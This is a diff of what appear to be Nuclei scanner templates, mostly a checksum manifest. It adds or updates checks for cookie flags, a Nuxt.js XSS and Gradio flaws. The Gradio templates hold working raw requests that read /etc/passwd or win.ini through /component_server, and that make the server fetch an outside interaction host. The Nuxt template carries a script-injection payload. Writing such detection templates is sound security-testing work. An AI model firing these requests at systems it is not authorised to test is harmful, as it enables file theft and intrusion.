# digest: 4a0a00473045022100b4e7ee7ca74a63f236707271d9219e6a4c1e204e12e3e8bb2d3714a64fa9e5a8022068ee95e033478df3256a2323cf1d05917f9d857f58146001422a1b7861ce02a3:922c64590222798bb761d5b6d8e72950

View File

@ -1,7 +1,7 @@
id: cookies-without-httponly-secure
id: cookies-without-httponly
info:
name: Cookies without HttpOnly or Secure attribute - Detect
name: Cookies without HttpOnly attribute - Detect
author: princechaddha,Mr.Bobo HP
severity: info
description: |
@ -38,6 +38,5 @@ http:
part: header
words:
- "HttpOnly"
- "Secure"
negative: true
# digest: 4a0a004730450220123181274d69492219d698d89cf1fd5d0b71c908b139b6a52e15df69c7b8c6aa022100da21796dba95fc800f492b76bed8877b493b296856dc7f71fe89da22aff0fe3f:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100d9b191fde19b5091d9b1ed789721ea3e93689c0b964658df7a578d1e5903ea5802205b26c3af43b5b32a731d2ecd2ef48401ae45a37258168e67710fb2f47abb0989:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,42 @@
id: cookies-without-secure
info:
name: Cookies without Secure attribute - Detect
author: vthiery
severity: info
description: |
Checks whether cookies in the HTTP response contain the Secure attribute. If the Secure flag is set, it means that the cookie can only be transmitted over HTTPS
impact: |
Lack of Secure flag on cookies allows the cookie to be sent over unsecure HTTP, making it vulnerable to man-in-the-middle (MITM) attacks.
remediation: |
Ensure that all cookies are set with the Secure attribute to prevent MITM attacks.
reference:
- https://owasp.org/www-community/controls/SecureCookieAttribute
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
metadata:
verified: true
max-request: 1
tags: misconfig,http,cookie,generic
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Set-Cookie'
- type: word
part: header
words:
- "Secure"
negative: true
# digest: 4a0a0047304502201f25fc7e9994e80e24096e05ea5deaeae1785bbfa343e9e71203f64f6ab2c22902210080b280e3b3384bb5332aaf450b1c9e541b0e43795a97df1bfe8d050f4742c277:922c64590222798bb761d5b6d8e72950

View File

@ -15,9 +15,9 @@ http:
matchers:
- type: word
words:
- x-goog-metageneration
- X-Goog-Metageneration
part: header
# digest: 4a0a00473045022016072ed0dd17077e2035b0d53506ba19f8dc600c375fd55b469870b2b36c2d17022100b6f9dde6d428cffc1cae21932a1a5a81ff87f210e1f8dd572d63255596c082ff:922c64590222798bb761d5b6d8e72950
words:
- "x-goog-metageneration"
- "x-goog-generation"
case-insensitive: true
# digest: 4a0a00473045022043c130c84c7c7ff302413d36f39fdd14b34e2ae766c8728f2d7ef891cd125f80022100c51e9928d746128a91e866f8bd77bb46897602cc17ed9d9fbacbfd9de7794e68:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,64 @@
id: gradio-lfi
info:
name: Gradio 3.47 3.50.2 - Local File Inclusion
author: nvn1729
severity: high
description: |
Local file read by calling arbitrary methods of Components class between Gradio versions 3.47 3.50.2
reference:
- https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
- https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
epss-percentile: 0.36659
metadata:
verified: true
max-request: 2
shodan-query: html:"__gradio_mode__"
tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr
http:
- raw:
- |
POST /component_server HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"component_id": "{{fuzz_component_id}}", "data": "{{path}}", "fn_name": "make_temp_copy_if_needed", "session_hash": "aaaaaaaaaaa"}
- |
GET /file={{download_path}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
name: download_path
internal: true
group: 1
regex:
- "\"?([^\"]+)"
attack: clusterbomb
payloads:
fuzz_component_id: helpers/wordlists/numbers.txt
path:
- /etc/passwd
- c:\\windows\\win.ini
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body_2
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: status
status:
- 200
# digest: 4b0a00483046022100dee488452114cf8cba3e74b09165ce96dd590f0ac0705828cdc977a8a8bd5f39022100d64d96b1ba3cd9e79039f6b3436f1cf7fd37e88bb8bb0249b76423524c3939a4:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,58 @@
id: gradio-ssrf
info:
name: Gradio 3.47 - 3.50.2 - Server-Side Request Forgery
author: nvn1729
severity: high
description: |
Gradio Full Read SSRF when auth is not enabled, this version should work for versions 3.47 - 3.50.2.
reference:
- https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
- https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
epss-percentile: 0.36659
metadata:
verified: true
max-request: 2
shodan-query: html:"__gradio_mode__"
tags: cve,cve2024,unauth,gradio,ssrf
http:
- raw:
- |
POST /component_server HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"component_id": "{{fuzz_component_id}}", "data": "http://oast.me", "fn_name": "download_temp_copy_if_needed", "session_hash": "aaaaaaaaaaa"}
- |
GET /file={{download_path}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
name: download_path
group: 1
regex:
- "\"?([^\"]+)"
internal: true
payloads:
fuzz_component_id: helpers/wordlists/numbers.txt
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "<h1> Interactsh Server </h1>"
- type: status
status:
- 200
# digest: 4b0a0048304602210084254e5be884aa98296a738a4c7318f5fc3144cd7a242e19dfc57c3e7540a125022100db240aae793f3c25c826a49fe256d4109590d1fd40a2ad08de4d75925b3985f3:922c64590222798bb761d5b6d8e72950

View File

@ -1,7 +1,7 @@
id: nuxt-js-xss
info:
name: Error Page XSS - Nuxt.js
name: Nuxt.js Error Page - Cross-Site Scripting
author: DhiyaneshDK
severity: medium
description: |
@ -11,23 +11,26 @@ info:
- https://bryces.io/blog/nuxt3
- https://twitter.com/fofabot/status/1669339995780558849
metadata:
verified: "true"
verified: true
max-request: 1
shodan-query: html:"buildAssetsDir" "nuxt"
fofa-query: body="buildAssetsDir" && body="__nuxt"
tags: huntr,xss,nuxtjs,error
tags: huntr,xss,nuxtjs
variables:
payload: "<script>alert(document.domain)</script>"
http:
- method: GET
path:
- "{{BaseURL}}/__nuxt_error?stack=%0A<script>alert(document.domain)</script>"
- "{{BaseURL}}/__nuxt_error?stack=%0A{{url_encode(payload)}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "{{payload}}"
- "window.__NUXT__"
condition: and
@ -35,5 +38,4 @@ http:
part: header
words:
- "text/html"
# digest: 4a0a00473045022100858932f971761dbf5f90cae1f6fd762587bc8db062bc348a0e75e6919d1c1ed502207f3e15e50de570269cc2d415aea273f1abb2440e270d272e572e7081f2a59402:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100e184ac245cc42774284e2fda8f4ffd559e46ffb273b587dfab98c576f73b92fa022100931427a4621c57da048aa4fdc2981b8ad64512cf8d4894e3dc3f1ce607d0b090:922c64590222798bb761d5b6d8e72950

View File

@ -189,8 +189,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd
code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17
code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9
contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159
cves.json:15e3d2b258890ea3f6670c981a4b0703d98a1b98
cves.json-checksum.txt:eb4c7db68b582f0cd4ecf6cdb67ff52c6532e739
cves.json:bb4672b4751b17c034799fabf7d52f0c8aed3302
cves.json-checksum.txt:b10cb415f16dd74d75e70e696defacaf045d8c3e
dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730
dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752
dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e
@ -206,11 +206,12 @@ dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:218f24aa37dd58a83d33318e22794a3d3
dast/vulnerabilities/redirect/open-redirect.yaml:4fa1fca9a4a36c7fd81faafd3f7bf474b4efa471
dast/vulnerabilities/rfi/generic-rfi.yaml:de3d066b0dc329ffbb333def6e7f1a5a4c1d5836
dast/vulnerabilities/sqli/sqli-error-based.yaml:13195b21140da0c8c21d2580efe17d40536dc75f
dast/vulnerabilities/sqli/time-based-sqli.yaml:c0bf67162953a70d11c3915a49e2a19a459b5f74
dast/vulnerabilities/ssrf/blind-ssrf.yaml:12e23b0638b7f0121088e6e0b9ed906a37a6fe26
dast/vulnerabilities/ssrf/response-ssrf.yaml:7860ce6af5f3856162386fc7c86d2da2ec4ed661
dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851
dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253
dast/vulnerabilities/xss/reflected-xss.yaml:cbb257b78545acfdb058780827b255ca8ac6099c
dast/vulnerabilities/xss/reflected-xss.yaml:46717ee593fe9809385572b82e9b1a7265c3cf6f
dast/vulnerabilities/xxe/generic-xxe.yaml:c0dfcc8fa1d2879f2985806eff40727036cdf51a
dns/azure-takeover-detection.yaml:5295c90a6fa66f513eca7f6f30eee8745a41aa0a
dns/bimi-detect.yaml:bde903bfbcd370747978534ce2391131b12b08f0
@ -614,11 +615,12 @@ helpers/payloads/swagger-payload:6e0a08fc7310a1ce07226a012520ba1f73029945
helpers/payloads/wp-social-warfare-rce.txt:6b93ad84c3035c6779d75057e645171476cbc530
helpers/wordlists/adminer-paths.txt:2ac24141ad5f28203b9ca35719bd51f39381aa36
helpers/wordlists/grafana-plugins.txt:0621c38f856c64ac8c96e53b96bc90881fe35704
helpers/wordlists/headers.txt:2effcf74fe0332b242c98df1f50f774c556746d6
helpers/wordlists/headers.txt:1d92a664669f50906e4ad90d299f78cbeb6f8687
helpers/wordlists/mdb-paths.txt:c380943cfa8a337ccb1ea38062e2856924960f1a
helpers/wordlists/mysql-passwords.txt:39cb7f9500b441097c09510fbf93b7c123cd77e9
helpers/wordlists/mysql-users.txt:d46fe9fd35f6b8d4de6901572e04bcc0845e8332
helpers/wordlists/numbers.txt:8084f0f10255c5e26605a1cb1f51c5e53f92df40
helpers/wordlists/params.txt:503c5527904f6c8846d31f87b1ac565c61d7c6c6
helpers/wordlists/prestashop-modules.txt:ae73ac19d088b28a943e8a9ce98ab4461e4dc029
helpers/wordlists/shiro_encrypted_keys.txt:3a072e8246dabee62eecfd62edef1b3977165f34
helpers/wordlists/ssh-passwords.txt:04aaf532580a605e8356df448196ac06939ad544
@ -1927,7 +1929,7 @@ http/cves/2020/CVE-2020-7796.yaml:6157549eb38e8fc6de1a599af340892651ab2a72
http/cves/2020/CVE-2020-7943.yaml:8afe020a36b1eb69a2b2eb06c08f9f4cd0ca5ff2
http/cves/2020/CVE-2020-7961.yaml:6e6a2d87ac59b710e9f06ac8468de57cd0695f9a
http/cves/2020/CVE-2020-7980.yaml:1b8c02806c66311834a931181b6acb7fada2bc9d
http/cves/2020/CVE-2020-8115.yaml:68173d36e231cef7317d8a24655cde2134bf2052
http/cves/2020/CVE-2020-8115.yaml:6f19a8294b923f314ce8b28098bd70e55a123858
http/cves/2020/CVE-2020-8163.yaml:1d8b50738e8aa4b505e6dda88b20fa7716de3ee5
http/cves/2020/CVE-2020-8191.yaml:eb7ce1550e3c02349142058d5a0b9a713e810915
http/cves/2020/CVE-2020-8193.yaml:4284d6d0a6afaa9469244d30d5ff29ff306d8ce6
@ -2365,6 +2367,7 @@ http/cves/2021/CVE-2021-43734.yaml:ba2e81ae59684a8bcfde140cc091cb3a77e3f427
http/cves/2021/CVE-2021-43778.yaml:2f3bb0a0f9ad88cc38b6dfa0abda010822203ea9
http/cves/2021/CVE-2021-43798.yaml:6afb9139e24bf0c40b9e5a0c12e49f83793920c2
http/cves/2021/CVE-2021-43810.yaml:e091cab75505c3576561a0e55d7f45be46ed0e9f
http/cves/2021/CVE-2021-43831.yaml:89f39234d1633cece6948896980a84ad95fafcb4
http/cves/2021/CVE-2021-44077.yaml:cb77a5c0a315f9be21761f87ed2d2c7d51fd1d5d
http/cves/2021/CVE-2021-44138.yaml:a802f5e3f53e4f8211dfd348b2ca5ddcb9304732
http/cves/2021/CVE-2021-44139.yaml:740e49a49ce3c88b450eabd43ae798ffcacf8a0e
@ -3040,6 +3043,7 @@ http/cves/2023/CVE-2023-31059.yaml:ce8e595c554e7f91bb6e4ed339d987e571ffb947
http/cves/2023/CVE-2023-31446.yaml:5accf9db37b634e8c8bcc2cd58586c8e0df71827
http/cves/2023/CVE-2023-31465.yaml:34cb2d553d530d7ad867cf82d889cba8c6153019
http/cves/2023/CVE-2023-31548.yaml:0f5f5182e5679b2d22cc503cd577b487ef7fe72d
http/cves/2023/CVE-2023-32068.yaml:41b3c520f9803190b0bff32818680581cbea97fe
http/cves/2023/CVE-2023-32077.yaml:4fd13fb1ff9440e463e7d615d2f1ba70395821b9
http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b
http/cves/2023/CVE-2023-3219.yaml:245f94f5a5a80ebd7cd5912e7849ad425cfcc8cb
@ -3216,6 +3220,7 @@ http/cves/2023/CVE-2023-5074.yaml:0bee1e0b2d77d0ffbbbf8cc00d53acb4979ae28f
http/cves/2023/CVE-2023-5089.yaml:c51f608a3a99b7a7ea1a90f49badde7d12cf1e6f
http/cves/2023/CVE-2023-50917.yaml:f0cb72641b1188fc2f7a615137512a1b956eeeba
http/cves/2023/CVE-2023-50968.yaml:ba55dd8cde0223755e58c18a48ae9e7a5407aa62
http/cves/2023/CVE-2023-51449.yaml:f17017eea15c6a52827c4f6f17aec59624bfd30a
http/cves/2023/CVE-2023-51467.yaml:ca66217bafda2b96c5c17cad532af4bee418699d
http/cves/2023/CVE-2023-52085.yaml:8b9252b4ee0f19700fdbf7777b1865551167c2d8
http/cves/2023/CVE-2023-5244.yaml:e8676ea3fe8f5fdbf6a62de0894078ce7445b00d
@ -3272,6 +3277,7 @@ http/cves/2024/CVE-2024-1380.yaml:20b25b6bb316198f59ab5b21284278df2eeb480f
http/cves/2024/CVE-2024-1561.yaml:659c9112fbbf202496c98637b8ffcfd2665024ab
http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983
http/cves/2024/CVE-2024-1709.yaml:fbffa10f3832defdae69499878e00010a44c1b0a
http/cves/2024/CVE-2024-1728.yaml:53f4b2e0ca6437434e903db273382fb8d009fd46
http/cves/2024/CVE-2024-20767.yaml:241fd099c8ac13ce65b6bc56f755be96783242a2
http/cves/2024/CVE-2024-21644.yaml:48021ee39de24e3ea1ef7e900a5a28ebed70f411
http/cves/2024/CVE-2024-21645.yaml:0b8856904f2d109744123490861e51f34afcff6b
@ -3292,6 +3298,7 @@ http/cves/2024/CVE-2024-24919.yaml:0af6fe4076dcedc1a40e7b991c546f6473dbab1c
http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05
http/cves/2024/CVE-2024-25669.yaml:859ce6829af85dcbbc97aff746be54b6ab8d4d23
http/cves/2024/CVE-2024-25735.yaml:62e4fcd344865c267789835cfbc7bd1677e002d3
http/cves/2024/CVE-2024-2621.yaml:5b501a9ff0e69b8bfd0df0caaf97ebbaaba51301
http/cves/2024/CVE-2024-26331.yaml:1f13e279312f16452413eae02b0cb32971d720f8
http/cves/2024/CVE-2024-27198.yaml:428b5bbb2a88c48db434e13c0fdc3dea195f4a6f
http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d
@ -3304,26 +3311,31 @@ http/cves/2024/CVE-2024-28255.yaml:d7b149c542f2dba2d719e547ddc497ad029532e8
http/cves/2024/CVE-2024-28734.yaml:282a40ba7cd7f653bfbc9f16397b9c6115ca18b1
http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b
http/cves/2024/CVE-2024-2879.yaml:c2ce4ab84a2eac56ef529eeba7a3749e0394cd43
http/cves/2024/CVE-2024-28995.yaml:2256abea0b23dd20789317702178afdd5ceb4225
http/cves/2024/CVE-2024-29059.yaml:8339d52df93cf5aa744acd122780080e989fe7ca
http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100
http/cves/2024/CVE-2024-3097.yaml:b45cd14894d2dd544156fa7b88ec579b871834a9
http/cves/2024/CVE-2024-3136.yaml:0bdd17ee8bfd01bba9b229c8ddfcdb53092dacf2
http/cves/2024/CVE-2024-31621.yaml:53f009e716d10910d474a4dec892fefd6524efae
http/cves/2024/CVE-2024-31750.yaml:79b602d5b722a6a716b628652d2dd2955b50e4a1
http/cves/2024/CVE-2024-31848.yaml:7897724f33b3fb2247e15f6c2904421c54586c6c
http/cves/2024/CVE-2024-31849.yaml:3959023f6bd03c1ab24b2e711acd4683c98d8dbe
http/cves/2024/CVE-2024-31850.yaml:577eb6159f7a5fa2fa929980f842306c674bf2ca
http/cves/2024/CVE-2024-31851.yaml:c68bf4f7214f9abb654a5bb11cd9088cdb1fe690
http/cves/2024/CVE-2024-32113.yaml:d33bf2b38e8bb82edabfe4a94fa64fe2aed6cf56
http/cves/2024/CVE-2024-32399.yaml:d49df2f63485c7f67792285af884f5daa53513b5
http/cves/2024/CVE-2024-32640.yaml:6d2dacc8495a3cd5bf446bd3a1227b8c15c2fd74
http/cves/2024/CVE-2024-32651.yaml:801c05cf9fff8ede1e378acbaa7f52b17174a55c
http/cves/2024/CVE-2024-3273.yaml:fe07da69c4e263410727d688d92f4e06000f5c00
http/cves/2024/CVE-2024-3274.yaml:b56159631d06052a408c3897ef043b866ce0514c
http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab
http/cves/2024/CVE-2024-33575.yaml:bc3e1dc9d582e0bb3430a33791936484425fb962
http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc
http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2
http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8
http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654
http/cves/2024/CVE-2024-37393.yaml:20d877ad8786073ac602c19cd95eacb4f8d73436
http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189
http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd
http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c
http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310
http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181
@ -3956,9 +3968,9 @@ http/exposed-panels/ibm/ibm-dcec-panel.yaml:85de4a0aac53b7dd180b06e04f837e737a76
http/exposed-panels/ibm/ibm-decision-server-console.yaml:9bc550d72018a4bb6fd09c5466136ddfb003891e
http/exposed-panels/ibm/ibm-maximo-login.yaml:aaf8da0bfec6d4b716d5f5eeba93337e0064ab21
http/exposed-panels/ibm/ibm-mqseries-web-console.yaml:fe2cb848a2d5afd37b6701deac3321ab96befab9
http/exposed-panels/ibm/ibm-note-login.yaml:66155682019a6922f6b68bc4125a86812de71879
http/exposed-panels/ibm/ibm-note-login.yaml:8a5f0a28a24b645b7d2e0c499246e08276dfcfcd
http/exposed-panels/ibm/ibm-odm-panel.yaml:a4b0d5f8dd884061a745fe85fea95887dc948e23
http/exposed-panels/ibm/ibm-security-access-manager.yaml:83faa8d7636cd912e030c69615cf5e6fa59e871c
http/exposed-panels/ibm/ibm-security-access-manager.yaml:0cd521ff1a0b1bd1fccc74d9b3a1b16c9805a5b8
http/exposed-panels/ibm/ibm-service-assistant.yaml:900e28a644df1ddafc2074599f3606f7d150aab4
http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml:feb2ce063c143b44b20b6933e9d9de9d15f3fc06
http/exposed-panels/ibm/ibm-websphere-panel.yaml:63ec51d2ef895c41790d02a2e7c9e599ea72d438
@ -4503,6 +4515,7 @@ http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml:d2198b812f4062c0f360e
http/exposed-panels/truenas-scale-panel.yaml:56f855f113eb0d8fe648485a1ba0ea24988ae7da
http/exposed-panels/tufin-securetrack-login.yaml:63c396fb780b3aa5de4176aea0e183338ef43943
http/exposed-panels/tup-openframe.yaml:8e6f0bcd762cdf9098621e8323e811b702424060
http/exposed-panels/turnkey-lamp-panel.yaml:8ec785a66d2050a19b465630ee89555e0d90798a
http/exposed-panels/turnkey-openvpn.yaml:499a14d9a3eb9ca68ffcf856cd357b8a552bf30b
http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767
http/exposed-panels/typo3-login.yaml:4e116dbb08d4fa3bc3aed57ad47e38728f911996
@ -5288,7 +5301,7 @@ http/misconfiguration/apache/apache-couchdb-unauth.yaml:f1a42febc03d40ab2eb27519
http/misconfiguration/apache/apache-filename-enum.yaml:00fec57e8abf4422bb9223a4f1ce706b023f0eef
http/misconfiguration/apache/apache-hbase-unauth.yaml:73f22979593c54310c2145d482018010663fe9a2
http/misconfiguration/apache/apache-nifi-unauth.yaml:4e19b0b31aea4665b8ca4fa4c2aa6380182ce120
http/misconfiguration/apache/apache-server-status-localhost.yaml:66cb8088785ba5ec211abc13b82eeef13a4a1213
http/misconfiguration/apache/apache-server-status-localhost.yaml:ed27964d3819446bb04a4095a3edf2ae58872cba
http/misconfiguration/apache/apache-server-status.yaml:1afd6683f4ff99098d2c8a81ea650f1be4a81926
http/misconfiguration/apache/apache-storm-unauth.yaml:a4e0f588e65474220083ff0960511fc324b4f139
http/misconfiguration/apache/apache-zeppelin-unauth.yaml:18859a2711b1796228e38d53e2588c4a211e33d4
@ -5306,7 +5319,7 @@ http/misconfiguration/artifactory-anonymous-deploy.yaml:49628b203377dc7a16449154
http/misconfiguration/aspx-debug-mode.yaml:338648e96f3123018a8373d5b3bfe61c5c201bb1
http/misconfiguration/atlassian-bamboo-build.yaml:65a75813eec4e3918e5efcc46669bebe3b4310ba
http/misconfiguration/aws/aws-ec2-status.yaml:676383b1e7312422e3a7359ae0ede6e5500ec9ea
http/misconfiguration/aws/aws-object-listing.yaml:4b9e4b852563898d23697d06b8a6d057c5ce8dae
http/misconfiguration/aws/aws-object-listing.yaml:7c4d6662bbadf6585a95adbbfee865113a08888d
http/misconfiguration/aws/aws-redirect.yaml:3eae321734d805abec1fdc57bb8d110504106276
http/misconfiguration/aws/aws-s3-explorer.yaml:8ecb526ca030871303b3e3f0349edaf292f30f55
http/misconfiguration/aws/aws-xray-application.yaml:e7ec644ccf2a75882aeace1f7192b1bf5ba62db1
@ -5335,7 +5348,8 @@ http/misconfiguration/collectd-exporter-metrics.yaml:c47a1526e0297b0f553cbd12b0f
http/misconfiguration/command-api-explorer.yaml:ab22381f1611d06739015ed9ed6d87627905c86a
http/misconfiguration/confluence/confluence-oauth-admin.yaml:1e5391747c88bfa3e3b1b0fb3a0f16b90760a93b
http/misconfiguration/confluence-dashboard.yaml:e80a9c76f4cb07a076e2345877ddee3a721b5dd0
http/misconfiguration/cookies-without-httponly-secure.yaml:96433be16faef9b269fa66484b578933815e1e51
http/misconfiguration/cookies-without-httponly.yaml:b7d3567792f6d1da6385c3c2393db6e65216cdf8
http/misconfiguration/cookies-without-secure.yaml:624a1b5f88d0aff132d199eeffca11595bead000
http/misconfiguration/corebos-htaccess.yaml:01e578f80bbcf2552413ed4bf039cda8123fb19b
http/misconfiguration/cx-cloud-upload-detect.yaml:d971d4aa14a8b003126d9e7c15b33aa2406d963b
http/misconfiguration/d-link-arbitary-fileread.yaml:502347b551dfb97a21f2b321e5de24d42cc1f5ce
@ -6828,7 +6842,7 @@ http/technologies/google/cloud-run-default-page.yaml:91ff90b29a400729fd8dbef4aaf
http/technologies/google/firebase-detect.yaml:fa2021156b4a3de1e257f610042c076d83ecab21
http/technologies/google/firebase-urls.yaml:567d690e4e228892b057512c135046889827baa9
http/technologies/google/google-bucket-service.yaml:25ac8e0dd8cbf94da469ecc917650a838c45117d
http/technologies/google/google-storage.yaml:f43cd532e5f0230d310a4e0f856add1ecb8dd333
http/technologies/google/google-storage.yaml:6f4b77b2ce984d502f781974800f1940805db18c
http/technologies/google-frontend-httpserver.yaml:de094bfafe3b5aea16e1bffb3ab80cf789a6e3fb
http/technologies/gotweb-detect.yaml:9490354702dedc1297a7c0c812954a05efb475d0
http/technologies/graphiql-detect.yaml:a50e33498f73c5c27694fdad64d7d5f06dc1fe29
@ -7645,6 +7659,8 @@ http/vulnerabilities/gitlab/gitlab-rce.yaml:173dd50897b2956f85fce08f9730f740415e
http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml:969333f355e024ef605152fe26bb45511f20f4ad
http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml:8d551aa4f723d8e79ee57beb2f491c86f5b6cffc
http/vulnerabilities/gnuboard/gnuboard5-xss.yaml:83312ba18791464992c70dd4fe10965ba1ed2244
http/vulnerabilities/gradio/gradio-lfi.yaml:a69850b3a69de67b39650086e3b710acd4ae465b
http/vulnerabilities/gradio/gradio-ssrf.yaml:c0a20caa4fb295071efb720890b54bee093c0fda
http/vulnerabilities/grafana/grafana-file-read.yaml:7f8fa8a6408dbbd25e7c33bc203024a131b85704
http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml:02a334888358c47036d90f4d0fff958976da7f5f
http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml:bc54a4c9f7771c524140f1840157c03bf4651a54
@ -7717,7 +7733,7 @@ http/vulnerabilities/netsweeper/netsweeper-rxss.yaml:7ee726ace09d4659b2f3980105a
http/vulnerabilities/nps/nps-auth-bypass.yaml:90ea2e05d4bf385db0ceee0c92415817731d8a15
http/vulnerabilities/nuxt/nuxt-js-lfi.yaml:d51646219a3065dbf4024260104c2513d9e516d3
http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml:24cfa8b0b2dbd99b1eb75704e139da55e275274f
http/vulnerabilities/nuxt/nuxt-js-xss.yaml:136a0b904e00e30b73c966536aa6f4110be49e39
http/vulnerabilities/nuxt/nuxt-js-xss.yaml:9d37aae5f57e72101d40715ef24bb1fa7cf527d4
http/vulnerabilities/opencpu/opencpu-rce.yaml:d13458a710e74a36c6b74a216677b4a40a9562d0
http/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml:cbfc4feae73c9796e2cde0471a9891ae967a1655
http/vulnerabilities/oracle/oracle-ebs-xss.yaml:a395970ecf5cd11fc483b759836bc4402f2489ce
@ -8646,7 +8662,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
templates-checksum.txt:73a443496d5bda8552e1e38ab4b09951ff8b0139
templates-checksum.txt:86bac7e8379bf85b45635c5c2ba0558fa72032eb
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4